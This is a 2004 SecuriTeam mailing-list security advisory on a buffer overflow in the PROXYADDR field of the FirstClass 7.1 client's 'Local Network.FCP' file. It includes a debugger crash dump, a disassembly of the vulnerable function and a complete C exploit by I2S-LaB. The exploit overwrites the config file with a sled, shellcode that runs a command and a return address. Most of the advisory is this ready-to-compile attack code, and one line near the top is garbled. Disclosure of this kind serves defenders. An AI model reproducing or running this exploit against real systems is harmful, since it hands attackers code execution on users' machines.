[NT] FirsClass Client/Server Buffer Overflow (PROXYADDR)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04
- Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in Nuked-Klan (Local Include, SQL Injection)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Apr 2004 17:42:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
FirsClass Client/Server Buffer Overflow (PROXYADDR)
------------------------------------------------------------------------
SUMMARY
<http://www.centrinity.com/products/> FirstClass is "a cost-effective,
highly scalable, feature-rich messaging and communications solution for
enterprises, learning organizations, governments and service providers. At
the foundation of our award-winning FirstClass Communications Platform is
our Collaborative Groupware, which provides our users with the ability to
effectively communicate and share valuable resources and information via
email, conferencing, directories, individual and shared calendars and
online chats".
The FirstClass client suffers from a buffer overflow vulnerability, which
could allow an attacker to execute code without the user's intervention.
DETAILS
?b?D??5Erable Systems:
* FirsClass version 7.1, possibly prior
The problem originates from the "LOCAL NETWORK.FCP" file whose "PROXYADDR"
parameter is not correctly handled by the software. Any malicious user
both local and remote accessing the file can cause an arbitrary command
execution when the user logs in. On closer inspection:
==============================================================================
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\>type "c:\Program Files\FirstClass\fcp\Local Network.FCP"
PROXYPORT = 1080
PROXYADDR = "AAAAAAAAAAAAAAAABBBB"
CONNTYPE = 8
FCPENCRYPT = 1
DLSEND = 0
DLERRS = 0
DLRCV = 0
MDMDBG = 0
SLDBG = 0
TCPTXWIN = 10000
TCPRXBUF = 10000
TCPREMPORT = 510
C:\>c:\Program Files\FirstClass\Fcc32.exe
=============================================================================
This exception may be expected and handled:
eax=00000000 ebx=00000093 ecx=fffffffd edx=00000003 esi=00000075
edi=00c3c3f0
eip=42424242 esp=0012f720 ebp=41414141 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010212
42424242 ?? ??? ; << cannot read contents of memory address!
0:000> dd esp
0012f720 00c4a600 00c4a5d0 00000000 0012f798
0012f730 0054dae9 0012f8d8 00000000 00000280
0012f740 00c4a5d0 78478191 78469640 ffffffff
0012f750 00000004 022d6538 00c20000 0066024c
0012f760 00c4a5d0 00c4a5d0 022dc858 0012f77c
0012f770 0056ca34 022dc858 00000000 0012f78c
0012f780 00550a4f 022dc858 00000001 0012f8f8
0012f790 006229fd ffffffff 0012f7b4 0056c5e8
EIP = 42424242, which means that the program estimates that PROXYADDR can
only contain a maximum of 16 characters, that is an IP address
xxx.xxx.xxx.xxx. A disassembly of the function is show below:
==============================================================================
00401000 ; File Name : C:\Program Files\FirstClass\Fcc32.exe
00401000 ; Format : Portable executable for IBM PC (PE)
00401000 ; Section 1. (virtual address 00001000)
00401000 ; Virtual size : 00224175 (2244981.)
00401000 ; Section size in file : 00225000 (2248704.)
00401000 ; Offset to raw data for section: 00001000
00401000 ; Flags 60000020: Text Executable Readable
00401000 ; Alignment : 16 bytes
00401000 ; OS type : MS Windows
00401000 ; Application type: Executable 32bit
00401000
00401000
00401000 model flat
00401000
00401000 ;
---------------------------------------------------------------------------
005620DA ; S U B R O U T I N E
005620DA
005620DA
005620DA ; long __cdecl FCPProxyIPLong(unsigned char *)
005620DA ; Attributes: bp-based frame
005620DA
005620DA public FCPProxyIPLong@@YAJPAE@Z
005620DA FCPProxyIPLong@@YAJPAE@Z proc near ; CODE XREF:
CSerWTCP::Init(tCfgRec *,int)+22Ap
005620DA push ebp
005620DB mov ebp, esp
005620DD sub esp, 50h
005620E0 mov eax, [ebp+8]
005620E3 push eax
005620E4 lea ecx, [ebp-50h]
005620E7 push ecx
005620E8 call pstrcpy@@YAXPAEPBE@Z ; pstrcpy(uchar *,uchar const *)
005620ED add esp, 8
005620F0 push offset $SG29826_0 ; "\t.0.0.0.0."
005620F5 lea edx, [ebp-50h]
005620F8 push edx
005620F9 call pstrcat@@YAXPAEPBE@Z ; pstrcat(uchar *,uchar const *)
005620FE add esp, 8
00562101 lea eax, [ebp-50h]
00562104 push eax
00562105 call PtoCstr@@YAPADPAE@Z ; PtoCstr(uchar *)
0056210A add esp, 4
0056210D push offset $SG29828 ; "."
00562112 lea ecx, [ebp-50h]
00562115 push ecx
00562116 call _strtok
0056211B add esp, 8
0056211E push eax
0056211F lea edx, [ebp-0Ch]
00562122 push edx
00562123 call _strcpy
00562128 add esp, 8
0056212B lea eax, [ebp-0Ch]
0056212E push eax
0056212F call _atoi
00562134 add esp, 4
00562137 mov [ebp-10h], al
0056213A push 1
0056213C lea ecx, [ebp-10h]
0056213F push ecx
00562140 lea edx, [ebp-4]
00562143 push edx
00562144 call _memcpy
00562149 add esp, 0Ch
0056214C push offset $SG29831 ; "."
00562151 push 0
00562153 call _strtok
00562158 add esp, 8
0056215B push eax
0056215C lea eax, [ebp-0Ch]
0056215F push eax
00562160 call _strcpy
00562165 add esp, 8
00562168 lea ecx, [ebp-0Ch]
0056216B push ecx
0056216C call _atoi
00562171 add esp, 4
00562174 mov [ebp-10h], al
00562177 push 1
00562179 lea edx, [ebp-10h]
0056217C push edx
0056217D lea eax, [ebp-3]
00562180 push eax
00562181 call _memcpy
00562186 add esp, 0Ch
00562189 push offset $SG29834 ; "."
0056218E push 0
00562190 call _strtok
00562195 add esp, 8
00562198 push eax
00562199 lea ecx, [ebp-0Ch]
0056219C push ecx
0056219D call _strcpy
005621A2 add esp, 8
005621A5 lea edx, [ebp-0Ch]
005621A8 push edx
005621A9 call _atoi
005621AE add esp, 4
005621B1 mov [ebp-10h], al
005621B4 push 1
005621B6 lea eax, [ebp-10h]
005621B9 push eax
005621BA lea ecx, [ebp-2]
005621BD push ecx
005621BE call _memcpy
005621C3 add esp, 0Ch
005621C6 push offset $SG29837 ; "."
005621CB push 0
005621CD call _strtok
005621D2 add esp, 8
005621D5 push eax
005621D6 lea edx, [ebp-0Ch]
005621D9 push edx
005621DA call _strcpy
005621DF add esp, 8
005621E2 lea eax, [ebp-0Ch]
005621E5 push eax
005621E6 call _atoi
005621EB add esp, 4
005621EE mov [ebp-10h], al
005621F1 push 1
005621F3 lea ecx, [ebp-10h]
005621F6 push ecx
005621F7 lea edx, [ebp-1]
005621FA push edx
005621FB call _memcpy
00562200 add esp, 0Ch
00562203 mov eax, [ebp-4]
00562206 mov esp, ebp
00562208 pop ebp
00562209 retn
00562209 FCPProxyIPLong@@YAJPAE@Z endp
00562209
00562209 ;
---------------------------------------------------------------------------
This function is a proprietary function from FirstClass that equals to
inet_addr() from the winsock library. An approximation of the function in
C is presented below:
/*
* unsigned long inet_addr ( const char FAR * cp );
*/
The following is an approximation of this function in C language:
long __cdecl FCPProxyIPLong(unsigned char *data)
{
char temp[16], cIP[3], *p;
DWORD dwIpConverted = 0;
BYTE sIP = 0;
int i = 0;
lstrcpy( temp, data );
p = strtok( temp, "." );
while( p && i < 4 )
{
lstrcpy( cIP, p );
sIP = atoi( cIP );
memcpy( (BYTE *)&dwIpConverted + i, (BYTE *)&sIP , 1);
p = strtok( NULL, ".");
i++;
}
return dwIpConverted;
}
Taking notice of the following two lines:
char temp[16];
and
lstrcpy( temp, data );
It is clearly evident that if more than 16 characters are passed a buffer
overflow will be triggered.
Exploit:
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###########################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
###########################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
************************************************************/
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",
rawData[] =
/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"
"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"
"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"
"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"
"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"
"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"
"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"
"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
********************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
*********************************************************************
*
*/
"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"
"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"
"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"
"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"
"calc.exe & " // to execute
////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20"
"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"
"\x45\x44\x44"
/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"\x5f\x75\xC2\x00";
// Banner
printf ("###############################################\n"
"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
"Discovered & coded by I2S-LaB.\n\n"
"URL : http://www.I2S-LaB.com\n"
"MAIL : Contact[at]I2S-LaB.com\n\n");
if ( !argv[1]) argv[1] = FC_FILE;
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %s\nexiting.\n", p);
ExitProcess(0);
}
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%s\n",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error :
backup file not found!\n");
else if ( !lstrcmpi (argv[1], "/run"))
{
printf ("Saving the Local Network file...%s\n",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file
cannot be made");
printf ("Opening the Local Network file...");
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!\n");
ExitProcess (-1);
}
printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten,
NULL) ? "ok" : "Write file error!");
}
else printf ("usage : %s /RUN | /RESTORE [path to Local
Network.FCP]\n\n"
"/RUN : launch the xploit against \"Local Network.FCP\"\n"
"/RESTORE : Restore the previous \"Local Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the
\"Local Network.FCP\" to exploit.\n"
"Default is %s\n", argv[0], PATH);
}
Unofficial Patch:
An unofficial patch by I2S-Labs can be obtained from
<http://www.i2s-lab.com/Research-tools.html>
http://www.i2s-lab.com/Research-tools.html.
ADDITIONAL INFORMATION
The information has been provided by <mailto:contact@i2s-lab.com> I2S LAB
Security Advisory.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in Nuked-Klan (Local Include, SQL Injection)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
